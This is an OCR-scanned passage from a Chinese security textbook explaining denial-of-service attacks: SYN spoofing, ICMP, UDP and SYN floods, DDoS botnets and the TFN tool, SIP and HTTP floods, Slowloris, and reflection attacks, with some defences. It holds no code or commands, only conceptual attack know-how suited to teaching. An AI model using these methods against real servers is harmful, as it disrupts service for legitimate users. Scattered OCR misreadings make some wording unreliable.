重 发 这 些 数 据 包 。 因 而 基于 重 发 机 制 的 TCP 协议 是 一 个 可 靠 的 传输 协议 。 任 何 使 用 TCP 协议 
进行 数据 传输 的 应 用 程序 都 不 需要 考虑 数据 包 丢 失 或 者 重新 排序 问题 。 当 然 ， 这 也 增加 了 系统 
在 管理 数据 包 可 靠 传输 上 的 开销 。 

SYN 坎 骗 攻击 正 是 利用 了 目标 服务 器 系统 上 的 这 种 行为 而 发 动 攻击 。 攻 击 者 构造 出 一 定 
数量 的 具有 伪造 源 地 址 的 SYN 连接 请 求 数据 包 并 发 送 给 目标 系统 。 对 其 中 的 每 个 数据 包 ， 服 
务 器 都 要 记录 该 TCP 连接 请 求 的 详细 信息 ， 并 发 送 SYN-ACK 响应 包 到 请 求 数据 包 中 声称 的 


162 RAD tHEMZEARKSARE 


源 地 址 ， 如 图 7-3 所 示 。 如 果 的 确 存在 一 个 与 源 地 址 匹配 的 主机 ， 那 么 源 地 址 所 对 应 的 主机 将 
会 发 送 一 个 RST (reset， 复 位 ) 包 给 服务 器 ， 让 服务 器 取消 这 个 莫名 其 妙 的 连接 请 求 。 服 务 器 
接收 到 RST 包 后 会 取消 这 个 连接 请 求 并 删除 TCP 连接 表 中 的 相关 信息 。 但 是 ， 如 果 源 地 址 所 
对 应 的 主机 繁忙 或 者 根本 就 没有 主机 使 用 这 个 源 地 址 ， 那 么 将 不 会 有 RST 数据 包 发 送 给 服务 
器 。 这 时 ， 服 务 器 就 会 不 停 地 重新 发 送 SYN-ACK 包 到 源 地 址 ， 直 到 最 终 认定 连接 请 求 已 经 失 
败 并 删除 连接 请 求 表 中 的 相关 信息 。 从 SYN 连接 请 求 数据 包 到 服务 器 认定 连接 请 求 失败 的 这 
段 时 间 内 ， 服 务 器 使 用 TCP 连接 表 中 的 一 个 表 项 来 存储 相关 的 信息 。 而 连接 表 的 大 小 ( 表 项 
的 个 数 ) 是 在 假设 大 多 数 的 连接 请 求 能 够 在 短 时 间 内 完成 并 且 能 够 同时 处 理 合理 数量 的 请 求 的 
情况 下 设 定 的 。 然 而 ， 在 SYN 欺骗 攻击 中 ,攻击 者 发 送 大量 的 欺骗 性 的 连接 请 求 给 目标 服务 
器 ,这 些 欺骗 性 连接 请 求 的 信息 将 会 迅速 地 填 满 服 务 器 上 的 TCP 连接 表 。 而 一 旦 连接 表 被 填 
满 ， 那 么 后 来 的 TCP 连接 请 求 ， 包 括 来 自 正常 用 户 的 请 求 ， 都 不 会 得 到 服务 器 的 响应 。 在 正 

"| 常 网 络 运行 情况 下 ， 在 连接 超时 后 ， 已 超时 的 TCP 连接 请 求 的 相关 信息 会 被 清理 出 TCP 连接 

231| 表 。 但 是 攻击 者 不 会 给 服务 器 任何 喘息 的 机 会 ， 如 果 他 不 停 地 发 送 足 量 的 欺骗 性 TCP 连接 请 
求 给 服务 器 ， 那 么 TCP 连接 表 就 会 永远 被 填 满 ， 导 致 服务 器 与 Internet 的 连接 被 切断 ， 无 法 响 
应 大 多 数 合法 的 连接 请 求 。 


J 服务 器 g 
ry 


ane. J 
欺骗 的 源 地 
址 的 SYNI n ACK 
(seq=y, ack=x+1) 
发 送 到 不 存 
超时 之 后 重 发 在 的 客户 端 
SYN-ACK 包 的 SYN-ACK 
包 被 丢弃 
假定 连接 
请 求 失 败 


17-3 TCP SYN 欺骗 攻击 


为 了 尽 可 能 多 地 占用 服务 器 上 的 TCP 连接 表 ， 攻击 者 一 般 都 希望 使 用 那些 不 会 用 RST 响 
应 SYN-ACK 的 源 地 址 。 这 可 以 通过 令 那 些 具 有 被 选 作为 伪造 源 地 址 的 主机 超载 或 者 仅仅 使 用 
大 范围 随机 地 址 做 到 。 对 于 后 者 ， 攻 击 者 依据 这 样 的 事实 ，Internet 上 有 很 多 未 被 使 用 的 地 址 。 
因此 ， 随 机 产生 的 源 地 址 有 相当 一 部 分 不 会 有 与 其 对 应 的 真实 主机 。 
在 网 络 流量 方面 ，SYN 欺骗 攻击 和 基本 的 洪 泛 攻击 有 明显 的 差别 。SYN 攻击 所 形成 的 
网 络 流量 相对 来 说 比较 小 ， 更 不 会 接近 与 服务 器 相连 的 链 路 的 最 大 容量 。 只 要 能 够 使 得 TCP 
连接 表 被 填 满 就 可 以 。 这 就 意味 着 攻击 者 不 必 像 洪 泛 攻击 那样 访问 大 容量 的 网 络 连接 。 在 如 
图 7-1 所 摘 述 的 网 络 中 ， 中 型 的 组 织 甚至 宽带 家 庭 用 户 都 可 以 利用 SYN 欺骗 攻击 成 功 地 攻击 
大 型 公司 的 服务 器 。 
利用 单一 主机 进行 的 洪 泛 攻击 和 SYN 欺骗 攻击 可 能 是 DoS 攻击 最 常见 的 两 种 早期 形 
C32| 式 。 洪 泛 攻击 具有 明显 的 限制 ， 需 要 使 用 许多 主机 才能 增加 其 有 效 性 。 接 下 来 我 们 将 要 分 析 
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洪 泛 攻击 的 一 些 变种 。 这 些 攻击 可 以 由 一 个 系统 或 多 个 系统 发 起 ， 采 用 我 们 下 面 将 要 研究 的 
机 制 。 
7.2 洪 泛 攻击 

根据 攻击 所 使 用 的 网 络 协议 不 同 ， 洪 泛 攻击 可 以 划分 为 不 同类 型 。 不 管 何 种 类 型 的 洪 泛 攻 
击 ， 其 目的 大 都 是 使 到 服务 器 的 链 路 超 负荷 。 洪 泛 攻击 的 目的 也 可 以 是 使 服务 器 处 理 和 响应 网 
络 流量 的 能 力 超 负荷 。 洪 泛 攻击 利用 大 量 的 恶意 数据 包 ( 相 比 于 合法 网 络 流量 是 压倒 性 的 ) 来 
充斥 服务 器 的 整个 网 络 连接 。 由 于 这 种 网 络 拥塞 ， 在 到 目标 服务 器 的 路 径 上 的 路 由 器 上 很 多 的 
数据 包 会 被 丢弃 。 合 法 的 流量 很 难 在 洪 泛 攻击 中 存活 下 来 ， 因 而 不 能 访问 服务 器 。 这 样 ， 服 务 
器 对 网 络 连接 请 求 的 响应 能 力 急 剧 下 降 ， 其 至 完全 无 法 响应 。 

其 实 ， 几 乎 任何 类 型 的 网 络 数据 包 都 可 以 用 来 进行 洪 泛 攻 击 。 只 要 数据 包 能 够 被 允许 流 过 
到 目标 系统 的 链 路 ， 那 么 它 就 可 以 消耗 到 目标 服务 器 的 某 个 链 路 上 的 所 有 可 用 流量 。 实 际 上 ， 
数据 包 越 大 ， 攻 击 的 效果 就 越 好 。 通 常 的 洪 泛 攻 击 所 使 用 的 攻击 数据 包 类 型 有 : ICMP 数据 包 、 
UDP 数据 包 和 TCP SYN 数据 包 ， 甚 至 可 使 用 其 他 的 IP 数据 包 类 型 。 然 而 ， 使 用 越 不 常用 的 
数据 包 ， 攻 击 效果 就 越 明 显 ， 也 就 越 容易 被 管理 员 过 滤 出 并 屏蔽 掉 。 


7.2.1 ICMP #iz 


在 7.1 节 中 我 们 提 到 的 利用 ICMP 回 送 请 求 数据 包 的 ping 洪 泛 攻击 是 一 种 经 典 的 ICMP 
洪 泛 攻击 。 由 于 ping 是 一 种 很 有 用 的 网 络 分 析 工 具 ， 网 络 管理 员 一 般 允 许 ICMP 回 送 请 求 
数据 包 进 入 他 们 的 网 络 ， 于 是 ICMP 回 送 请 求 数据 包 很 受 攻击 者 的 青睐 。 如 今 ， 很 多 的 组 织 
已 经 限制 了 这 种 类 型 数据 包 的 访问 并 将 之 隔离 于 防火 墙 之 外 。 作 为 回应 ， 攻 击 者 已 经 使 用 了 
其 他 类 型 的 ICMP 数据 包 。 由 于 其 中 某 些 数 据 包 类 型 应 该 被 处 理 以 允许 TCP/IP 的 正确 运行 ， 
因而 其 很 可 能 被 允许 通过 组 织 的 防火 墙 。 如 果 过 滤 掉 某 些 关键 的 ICMP 数据 包 类 型 ， 就 有 可 
能 降低 或 破坏 正常 的 TCP/IP 网 络 行为 。ICMP 目的 不 可 达 和 超时 数据 包 都 是 这 种 关键 数据 包 
类 型 的 实例 。 

攻击 者 可 以 生成 大 量 的 某 种 类 型 的 数据 包 。 由 于 这 些 数 据 包 中 包括 一 些 标记 为 错误 的 数 
据 包 (用 于 支持 错误 报告 功能 )， 攻 击 者 可 以 发 出 大 量 这 种 数据 包 以 增加 在 链 路 上 洪 泛 的 效果 。 
ICMP 洪 泛 式 攻击 仍然 是 DDoS 攻击 最 常见 的 类 型 [SYMA16]。 


7.2.2 UDP 洪 泛 


除了 使 用 ICMP 数据 包 攻 击 之 外 ， 攻 击 者 还 可 以 利用 UDP 数据 包 进 行 攻击 。UDP 数据 
包 被 发 送 到 目标 系统 提供 服务 的 端口 上 。 攻 击 者 通 第 会 将 UDP 数据 包 发 送 给 诊断 回 送 服务 ， 
因为 该 服务 在 服务 器 系统 上 一 般 是 默认 运行 的 。 如 果 服 务 器 上 开局 了 这 项 服务 ， 那 么 服务 器 
就 会 回应 一 个 市 有 初始 数据 内 容 的 UDP 数据 包 给 源 地 址 。 如 果 服 务 没有 开启 ， 则 这 个 来 自 攻 
击 者 的 数据 包 将 会 被 丢弃 ， 并且 可 能 会 回应 1CMP 目的 主机 不 可 达 数 据 包 给 发 送 者 。 其 实 ， 不 
管 服务 器 上 有 没有 开局 这 个 服务 ， 攻 击 者 都 已 经 达到 了 消耗 服务 器 的 链 路 容量 的 目的 。 几 乎 
任何 UDP 端口 号 都 可 以 作为 目标 。 所 产生 的 响应 数据 包 只 是 加 重 了 服务 器 及 其 网 络 链 路 的 
负载 。 

当 攻 击 者 利用 单一 系统 进行 UDP 洪 泛 攻击 时 ， 与 ICMP 洪 泛 攻击 一 样 ， 攻 击 者 一 般 会 使 
用 市 有 虚假 源 地 址 的 数据 包 。 当 攻击 者 使 用 多 个 系统 进行 UDP 洪 泛 攻 击 时 ， 一 般 会 使 用 受 控 
的 僵尸 机 的 真实 地 址 作为 数据 包 源 地 址 。 当 使 用 多 系统 时 ， 数 据 包 反射 流 及 识别 攻击 者 的 能 力 
部 会 有 所 下 降 。 
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7.2.3 TCP SYN #iz 


男 一 种 洪 泛 攻击 就 是 通过 发 送 TCP 数据 包 给 目标 系统 。 通 和 常 这 些 数据 包 都 是 市 有 真实 或 
虚假 源 地 址 的 正常 TCP 连接 请 求 ， 这 可 能 很 像 我 们 在 前 面 讲 到 的 SYN 欺骗 攻击 。 其 实在 SYN 
洪 泛 攻击 中 ， 攻 击 的 对 象 是 数据 包 的 总 量 而 不 是 目标 系统 上 的 网 络 处 理 程 序 。 这 也 是 SYN 其 
骗 攻 击 与 SYN 洪 泛 攻击 之 间 的 区 别 。 

SYN 洪 泛 攻击 也 使 用 TCP 数据 包 ， 这 些 数据 包 由 于 不 属于 任何 已 知 连接 而 被 服务 硕 拒 
绝 。 但 是 这 时 ， 攻 击 者 已 经 成 功 地 攻击 了 服务 硕 的 网 络 链 路 。 

如 果 攻 击 者 采用 单一 主机 攻击 ， 这 种 洪 泛 攻击 的 任何 变种 的 攻击 效果 会 受 攻击 系统 上 所 能 
产生 的 网 络 流量 总 量 的 限制 。 而 且 单 一 的 攻击 系统 也 会 使 得 攻击 者 更 容易 被 跟踪 。 鉴 于 这 些 原 
A, 一 个 复杂 的 多 攻击 系统 ( 即 SYN 洪 泛 攻击 ) 便 衍 生出 来 。 通 过 使 用 多 个 主机 ， 攻 击 者 可 
以 显著 地 增加 攻击 中 的 数据 包 数 量 ， 而 且 多 个 主机 中 的 任何 一 台 系 统 都 不 需要 有 很 高 的 性 能 或 
者 处 于 很 高 容量 的 链 路 。 它 们 不 是 单独 地 行动 ， 而 是 相互 协调 补偿 的 。 攻 击 者 可 以 通过 间接 地 
控制 各 个 僵尸 机 而 发 起 攻击 ， 而 攻击 者 则 在 一 个 很 遥远 的 地 方 ， 难 以 被 追踪 和 识别 。 使 用 多 机 
系统 的 间接 攻击 包括 : 

e 分 布 式 拒绝 服务 攻击 (DDoS) 

e 反射 攻击 (reflector attack) 

© 放大 攻击 (amplifier attack) 

接 下 来 我 们 将 依次 讨论 这 些 攻击 。 


7.3 分布 式 拒绝 服务 攻击 


认识 到 单机 洪 泛 攻击 的 局 限 性 并 引入 多 机 系统 进行 攻击 ， 是 DoS 攻击 工具 的 一 个 早期 
的 重要 发 展 。 典 型 的 多 机 系统 都 是 受 控 的 用 户 工 作 站 或 者 PC 机 。 攻 击 者 通过 操作 系统 上 或 
者 某 些 常用 应 用 程序 的 一 些 熟知 的 漏洞 来 获得 访问 这 些 系统 的 权限 ， 并 在 上 面 安装 自己 的 程 
序 。 这 些 被 入侵 的 主机 系统 就 是 所 谓 的 僵尸 机 ( zombie)。 一 旦 僵尸 机 被 安装 上 合适 的 后 门 程 
序 ， 就 会 完全 处 在 攻击 者 的 控制 之 下 。 攻 击 者 控制 的 大 量 僵尸 机 组 合 在 一 起 就 形成 一 个 僵尸 
网 络 ( botnet)， 这 我 们 已 在 第 6 章 讨 论 过 。 这 种 由 众多 僵尸 机 形成 的 僵尸 网 络 往往 是 攻击 者 所 
青睐 的 ， 可 以 用 它们 达到 各 种 各 样 的 目的 ,包括 分 布 式 拒绝 服务 ( Distribute Denial-of-Service, 
DDoS) 攻击 。 事 实 上 ， 有 一 个 地 下 经 济 创建 和 雇佣 僵尸 网 络 并 专门 用 于 此 类 攻击 。[SYMA16] 
报告 证 据 显 示 ，2015 年 发 生 的 DDoS 攻击 中 有 40% 来 自 此 类 僵尸 网 络 。 如 图 7-1 所 示 ， 某 些 
宽带 用 户 系统 被 攻击 者 控制 ， 并 作为 僵尸 机 对 企业 或 其 他 网 络 链 路 发 起 攻击 。 

虽然 攻击 者 可 以 独立 地 对 每 个 僵尸 机 进行 直接 控制 ， 但 攻击 者 更 多 采用 等 级 方式 控制 僵尸 
机 。 其 中 少量 的 系统 充当 执行 者 (handler)， 负 责 控 制 大 量 的 其 他 代理 系统 ， 如 图 7-4 所 示 。 这 
种 等 级 控制 方式 有 着 诸多 优点 。 攻 击 者 可 以 通过 发 送 一 条 单一 的 命令 给 执行 者 ， 然 后 执行 者 就 
会 自动 地 将 其 通知 给 所 有 在 其 控制 之 下 的 代理 系统 。 正 如 在 第 6 章 中 讲 到 的 那样 ， 自 动感 染 工 
具 会 扫描 并 控制 合适 的 僵尸 机 。 一旦 代理 软件 被 上 载 到 一 个 刚刚 被 控制 的 系统 ， 那 么 这 个 受 控 
系统 就 会 联系 一 个 或 多 个 执行 者 ， 并 将 该 系统 的 可 用 性 自动 地 通知 给 它们 。 通 过 这 种 方式 ， 攻 
击 者 可 以 自动 扩大 其 所 控制 的 僵尸 网 络 。 

一 个 最 早 的 、 著 名 的 DDoS 攻击 工具 是 部 落 洪 泛 网 络 (Tribe Flood Network, TFN), CE 
由 黑客 Mixter 编写 的 。 它 最 初 在 20 世纪 90 年 代 是 基于 Sun Solaris 操作 系统 被 开发 的 。 后 来 
被 重 写 为 部 落 洪 泛 网 络 2000 (TFN2K)， 可 以 运行 在 UNIX „Solaris 和 Windows NT 操作 系统 上 。 
TFN 和 TFN2K 使 用 两 层 的 等 级 控制 模式 ， 如 图 7-4 所 示 。 代 理 系 统 就 是 一 个 木马 程序 ， 这 个 
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木马 程序 可 以 在 受 控 的 僵尸 系统 上 进行 自我 复制 和 和 运行， 而 且 可 以 进行 ICMP 洪 泛 攻击 、SYN 
洪 泛 攻击 、UDP 洪 泛 攻击 以 及 ICMP 放大 攻击 等 形式 的 DoS 攻击 。TFN 攻击 数据 包 并 不 使 用 
虚假 源 地 址 ， 而 是 利用 大 量 的 受 控 系 统 和 特殊 等 级 结构 来 变相 地 掩盖 返回 到 攻击 者 的 路 径 。 代 
理 系统 同样 可 以 执行 一 些 rootkit 功能 ， 见 第 6 章 。 执 行者 则 是 简单 的 命令 行程 序 ， 运 行 在 受 
控 系 统 上 。 攻 击 者 利用 适当 的 机 制 获 得 僵尸 机 上 的 shell 访问 权限 ， 然 后 运行 带 有 期 望 选项 的 
执行 者 程序 。 每 一 个 执行 者 都 可 以 控制 大 量 的 代理 系统 ， 并 用 提供 的 列表 进行 标识 。 执 行者 与 
代理 系统 之 间 的 通信 和 是 经 过 加 密 的 ， 而 且 会 伴随 着 一 些 诱骗 数据 包 来 迷惑 网 络 管 理 员 ， 防 止 被 
监控 或 进行 控制 流量 分 析 。 而 且 它 们 之 间 的 通信 以 及 攻击 本 号 可 以 通过 随机 化 的 TCP、UDP 
和 ICMP 数据 包 来 发 送 。TFN 攻击 工具 说 明了 DDoS 攻击 系统 的 典型 功能 。 





图 7-4 DDoS 攻击 体系 结构 


目前 ， 很 多 其 他 类 型 的 DDoS 攻击 工具 已 经 出 现 。 这 些 DDoS 攻击 工具 更 多 的 是 使 用 
IRC 旨 、 其 他 类 似 的 即时 消息 服务 器 程序 或 者 基于 网 络 的 HTTP 服务 来 管理 与 代理 系统 之 间 的 
通信 ， 以 取代 专用 的 执行 者 程序 。 为 了 防止 命令 流量 的 分 析 ， 如 今 很 多 的 DDoS 攻击 工具 还 采 
用 加 密 机 制 来 验证 代理 系统 的 身份 。 

为 了 防止 自己 成 为 DDoS 攻击 中 的 不 知情 参与 者 ， 最 好 的 措施 是 不 让 自己 的 系统 被 攻击 者 
控制 。 这 就 要 求 我 们 有 良好 的 系统 安全 操作 规范 ， 及 时 打 补 丁 ， 升 级 操作 系统 和 应 用 程序 到 最 
新 版 本 。 

对 于 DDoS 攻击 的 目标 来 讲 ， 其 对 攻击 的 应 对 与 对 任何 的 洪 泛 攻击 的 应 对 一 样 ， 只 是 应 对 
更 多 、 更 复杂 。 在 7.6 节 和 7.7 节 中 我 们 会 讲述 一 些 常 用 的 防御 和 应 对 措施 。 


7.4 ”基于 应 用 的 市 宽 攻 击 


强制 目标 进行 资源 消耗 操作 是 拒绝 服务 的 一 种 可 能 有 效 的 策略 ， 这 些 操作 消耗 的 资源 与 攻 
击 付出 的 代价 是 极 不 相称 的 。 例 如 ，Web 站 点 可 能 会 为 了 响应 一 个 简单 的 请 求 而 长 时 间 忙 于 诸 
如 搜索 之 类 的 操作 。 基 于 应 用 的 带宽 攻击 ， 是 试图 利用 服务 问 上 不 均衡 的 大 量 资源 开销 而 进行 
的 。 本 节 ， 我 们 将 关注 两 种 可 以 用 来 进行 此 类 攻击 的 协议 。 


© Internet 中 继 聊天 (Internet Relay Chat, IRC) 是 最 早 开发 的 即时 通信 系统 之 一 ， 其 具有 大 量 的 开源 服务 器 实 
现 。 它 经 常 被 攻击 者 使 用 ， 将 其 修改 之 后 作为 控制 大 量 代理 的 执行 者 程序 。 利 用 标准 聊天 机 制 ， 攻 击 者 可 
以 通过 中 继 将 消息 发 送 给 连接 到 服务 器 该 通道 的 所 有 代理 。 男 外 一 种 方法 是 将 消息 直接 发 送 给 一 个 代理 或 
一 个 已 定义 的 代理 组 。 
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7.4.1 SIP #iz 


IP 电话 ( Voice over IP, VoIP) 技术 已 广泛 应 用 于 Internets IP 电话 建立 呼叫 使 用 的 标准 协 
议 是 会 话 发 起 协议 (Session Initiation Protocol, SIP), SIP 是 一 个 基于 文本 的 协议 ,语法 与 
HTTP 协议 类 似 。SIP 消息 有 两 种 不 同形 式 : 请 求 和 啊 应 。 图 7-5 是 对 SIP INVITE 消息 的 操作 
的 一 个 简要 闻 述 ，SIP INVITE 消息 是 用 来 在 客户 代理 间 建 立 媒 体会 话 的 。 在 这 个 例子 中 ， 
Alice 的 客户 代理 运行 在 一 台 计 算 机 上 ，Bob 的 代理 运行 在 一 部 手机 上 。Alice 的 客户 代理 被 设 
置 为 与 其 域 中 的 一 台 代理 服务 器 (外 呼 服 务 ) 通信 ， 并 为 邀请 Bob 的 客户 代理 加 入 会 话 而 开始 
加 代理 服务 器 发 送 一 个 INVITE SIP 请 求 。 代 理 服 务 器 通过 DNS 服务 器 查找 到 Bob 使 用 的 代 
理 服务 器 的 地 址 ， 然 后 将 INVITE 请 求 转发 至 Bob 的 代理 服务 器 。 服 务 器 将 请 求 继续 转发 至 
Bob 的 客户 端 ， 于 是 Bob 的 手机 便 响 了 @ 。 

SIP 洪 谤 攻击 利用 的 是 单个 INVITE 请 求 造成 的 相当 大 的 资源 开销 。 攻 击 者 利用 伪造 的 IP 
地 址 回 一 个 SIP 代理 洪 泛 大 量 的 INVITE 请 求 ， 或 者 利用 一 个 僵尸 网 络 生成 大 量 的 INVITE 请 
求 来 进行 DDoS 攻击 。 此 类 攻击 对 SIP 代理 服务 器 造成 负载 的 方式 有 两 种 : 其 一 ， 服 务 器 的 资 
源 被 INVITE 请 求 消耗 ; 其 二 ， 服 务 需 的 网 络 容量 被 消耗 。 被 呼叫 的 用 户 也 是 此 类 攻击 的 受害 
者 。 目 标 系 统 被 大 量 伪造 的 IP 电话 请 求 洪 泛 攻击 ， 导 致 系统 无 法 响应 合法 的 请 求 。 


DNS 
服务 器 










返回 Bob 的 
代理 服务 器 (3 
的 下 地 址 





ë NS 请 求 : 


biloxi.com 


INVITE sip:bob@biloxi.com 
AK: sip:alice@atlanta.com 






客户 端 Alice a 
A| 7-5 SIP INVITE 场景 


7.4.2 基于 HTTP 的 攻击 


我 们 考虑 利用 两 种 不 同 的 手段 攻击 超 文本 传输 协议 (HTTP) 来 达到 拒绝 服务 的 目的 。 
HTTP 洪 泛 攻击 HTTP 洪 泛 攻击 指 的 是 利用 HTTP 请 求 攻 击 Web 服务 器 。 这 是 一 种 


© 文献 [STAL11a] 中 有 对 SIP 操作 的 更 详细 的 讲述 。 
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DDoS 攻击 ，HTTP 请 求 来 自 许 多 不 同 的 bots。 这 些 请 求 可 以 被 预 设 为 消耗 相当 大 的 资源 的 形 
式 。 例 如 ， 从 目标 处 下 载 一 个 大 文件 的 HTTP 请 求 会 令 Web 服务 器 从 硬盘 中 读 取 文件 ， 然 后 
将 其 存储 在 内 存 中 ， 将 其 转换 为 一 个 网 络 包 流 ， 再 传输 这 些 网 络 包 。 这 一 过 程 不 仅 消耗 了 内 存 
资源 ， 还 消耗 了 处 理 资源 和 传输 资源 。 

此 类 攻击 的 一 个 变种 被 称 为 递归 HTTP 洪 泛 。 在 这 个 例子 中 ，bots 从 给 定 的 HTTP 链接 出 
发 ， 通 过 递归 方式 遍历 给 定 Web 服务 器 的 所 有 链接 。 这 种 攻击 也 被 称 为 息 虫 。 

Slowloris ”有 一 种 被 称 为 Slowloris[SOUR12] 的 HTTP 攻击 形式 ， 它 十 分 有 趣 却 又 非 正 常 
[DAMO12]。Slowloris 利用 多 线程 支持 多 个 到 同一 服务 器 应 用 程序 的 请 求 技 术 进 行 攻击 ， 这 是 
通用 的 服务 器 技术 。 它 通过 向 Web 服务 器 不 停 地 发 送 不 完整 的 HTTP 请 求 ， 试 图 独占 所 有 可 
用 的 请 求 处 理 线程 。 由 于 每 个 请 求 都 需要 消耗 一 个 线程 ， 所 以 Slowloris 攻击 最 终 能 耗 尽 所 有 
Web 服务 器 的 连接 能 力 ， 从 而 有 效 地 拒绝 合法 用 户 的 访问 请 求 。 

HTTP 协议 规范 (RFC 2616) PAAR: 如 果 有 空 行 的 话 ， 空 行 必须 用 于 表示 请 求 头 部 的 未 端 
或 载荷 的 开始 。 一 旦 接收 到 完整 的 请 求 ，Web 服务 器 便 会 响应 。Slowloris 攻击 通过 建立 多 个 
到 Web 服务 器 的 连接 来 实施 。 在 每 个 连接 中 ， 发 送 一 个 不 包含 终止 换行 序列 的 不 完整 的 请 求 。 
攻击 者 周期 性 地 发 送 额 外 的 报头 行 来 维持 连接 一 直 处 于 活跃 状态 ， 但 是 不 发 送 终止 换行 序列 。 
Web 服务 器 会 保持 该 连接 处 于 打开 状态 ， 期 待 收 到 更 多 的 信息 以 完成 这 个 请 求 。 随 着 攻击 的 持 
续 进 行 ， 需 长 时 间 维 持 的 Slowloris 连接 的 规模 也 会 增加 ， 最 后 消耗 掉 Web 服务 器 所 有 可 用 的 
连接 ， 因 此 致使 Web 服务 器 没有 响应 合法 请 求 的 能 力 。 

Slowloris 与 典型 拒绝 服务 攻击 不 同 之 处 在 于 ，Slowloris 利用 合法 的 HTTP 流量 ， 并 且 不 
依赖 于 能 攻击 特殊 HTTP ARS ae PF bug 的 特殊 的 “ 坏 的 ”HTTP 请 求 。 因 此 ， 现 有 依赖 特征 检 
测 的 入侵 检测 和 入 侵 防御 手段 无 法 识别 出 Slowloris。 这 意味 着 即使 部 署 有 企业 级 的 人 侵 检测 系 
统 和 人 人 侵 防御 系统 ，Slowloris 依然 能 有 效 地 发 起 攻击 。 

现在 有 很 多 对 抗 Slowloris 攻击 的 措施 ， 包 括 限 制 特殊 主机 接 入 的 比例 ， 对 每 个 连接 设置 
超时 机 制 和 延迟 绑 定 。 延 迟 绑 定 由 负载 均衡 软件 实现 。 从 本 质 上 讲 ， 负 载 均 衡 会 对 HTTP 请 求 
报头 做 完整 性 检查 ， 这 意味 着 除非 HTTP 客户 端 发 送 报头 的 最 后 两 个 回 车 和 换行 ， 否 则 该 请 求 
是 不 会 被 送 至 Web 服务 器 的 。 这 是 信息 中 的 关键 比特 。 从 根本 上 说 ， 延 迟 绑 定 确保 了 Web Ak 
务 器 或 代理 不 会 看 到 Slowloris 发 送 来 的 不 完整 的 请 求 。 


7.5 反射 攻击 与 放大 攻击 


在 DDoS 攻击 中 ， 中 间 媒 介 是 运行 攻击 者 程序 的 受 控 系统 。 与 DDoS 攻击 不 同 ， 反射 攻 
击 和 放大 攻击 通常 利用 的 是 网 络 服务 系统 的 正常 功能 。 攻 击 者 发 送 带 有 虚假 源 地 址 的 数据 包 给 
某 些 网 络 服务 系统 上 的 服务 。 网 络 服务 器 为 了 啊 应 这 些 数 据 包 ， 会 发 送 一 个 响应 包 给 攻击 包 所 
指向 的 源 地 址 ， 而 这 个 地 址 正 是 攻击 者 想 要 攻击 的 目标 系统 。 如 果 攻 击 者 发 送 一 定数 量 的 拥有 
同样 源 地 址 的 请 求 包 给 一 定数 量 的 提供 同样 服务 的 服务 器 ， 那 么 这 些 服务 所 产生 的 响应 数据 
包 几 乎 会 全 部 占据 目标 系统 的 网 络 链 路 。 这 些 服务 顺 系 统 实际 上 成 为 DDoS 攻击 的 中 间 媒 介 
(intermediary)， 而 且 它 们 对 数据 包 的 处 理 看 上 去 也 是 正常 的 。 这 也 就 意味 着 攻击 者 可 以 更 加 
容易 地 进行 攻击 并 可 躲避 跟踪 。 这 种 攻击 有 两 种 基本 的 变种 : 简单 反射 攻击 (simple reflection 
attack) 和 放大 攻击 (amplification attack), 


7.5.1 反射 攻击 
反射 攻击 是 这 种 攻击 的 一 种 直接 实现 。 攻 击 者 将 其 想 攻击 的 目标 系统 地 址 作为 数据 包 的 源 
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地 址 ， 并 将 这 些 数据 包 发 送 给 中 间 媒 介 上 的 已 知 网 络 服务 。 当 中 间 媒 介 响 应 时 ， 大 量 的 响应 数 
据 包 会 被 发 送 给 源 地 址 所 指向 的 目标 系统 。 它 能 有 效 地 使 攻击 从 中 间 媒 介 反 射出 去 ( 称 为 反射 
器 )， 这 也 就 是 这 种 攻击 被 称 为 反射 攻击 的 原因 。 

攻击 者 希望 他 们 所 利用 的 网 络 服 务 是 一 个 用 较 小 请 求 就 可 以 产生 较 大 响应 数据 包 的 服务 。 
这 样 ， 攻 击 者 就 可 以 利用 来 自 攻 击 系统 的 小 流量 请 求 数据 包 在 中 间 媒 介 上 产生 大 流量 的 响应 数 
据 包 到 目标 系统 。 通 常 UDP 服务 可 以 达到 这 种 目的 。 尽 管 回 送 请 求 服务 不 能 够 产生 较 大 的 
响应 数据 包 ， 但 在 早期 其 仍 是 攻击 者 的 首选 。 任 何 常 用 的 UDP 服务 都 可 以 用 来 进行 这 种 攻 
击 。chargen、DNS、SNMP EÈ ISAKMP 9 服务 都 可 以 产生 大 量 响应 数据 包 而 曾 被 用 来 进行 反射 
攻击 。 

作为 反射 攻击 的 中 间 系 统 往往 是 拥有 较 高 系统 性 能 的 网 络 服务 器 或 者 具有 良好 网 络 连 接 
性 能 的 路 由 器 。 这 就 意味 着 ， 攻 击 者 可 以 通过 中 间 系 统 (根据 实际 情况 的 需要 ) 形成 很 高 的 网 
络 通信 流量 。 即 使 不 能 够 形成 很 高 的 网 络 通 信 流 量 ， 这 些 流量 也 可 以 占用 目标 系统 的 部 分 网 络 
带宽 。 如 果 攻 击 者 循环 地 利用 多 个 中 间 媒 介 发 起 攻击 ， 那 么 网 络 管理 员 很 难 将 这 种 攻击 流量 从 
其 他 的 正常 通信 流量 中 区 别 开 来 。 这 样 ， 加 上 虚假 源 地 址 的 使 用 ， 更 是 加 大 了 追踪 攻击 者 的 
难度 。 

另 一 种 类 型 的 反射 攻击 利用 TCP SYN 数据 包 和 建立 TCP 连接 的 三 次 握手 进行 攻击 。 攻 击 
者 发 送 一 些 带 有 虚假 源 地 址 的 SYN 数据 包 给 选 定 的 中 间 媒 介 。 作 为 回应 ， 中 间 媒 介 会 回应 一 
A~ SYN-ACK 数据 包 给 这 个 数据 包 中 的 源 地 址 所 指向 的 主机 ， 这 是 真正 的 目标 系统 。 攻 击 者 利 
用 一 定数 量 的 中 间 媒 介 来 形成 大 量 的 SYN-ACK 数据 包 。 这 种 攻击 的 目的 就 是 在 目标 系统 的 网 
络 上 形成 足够 大 流量 的 数据 包 ， 洪 泛 攻击 目标 系统 的 网 络 链 路 。 目 标 系 统 接收 到 SYN-ACK 数 
据 包 后 ， 由 于 本 机 根本 没有 提出 TCP 请 求 ， 因 此 对 于 每 个 SYN-ACK 数据 包 会 返回 一 个 RST 
包 。 此 时 ,攻击 者 已 经 达到 了 淹没 目标 系统 的 网 络 链 路 的 目的 。 

利用 SYN-ACK 的 反射 攻击 不 同 于 本 章 前 面 所 讲 的 SYN 欺骗 攻击 。 这 种 攻击 的 目的 就 是 
洪 泛 目标 系统 的 网 络 带 宽 ， 而 不 是 耗 尽 目标 系统 的 网 络 处 理 资源 。 当 然 ， 因 为 需要 降低 攻击 行 
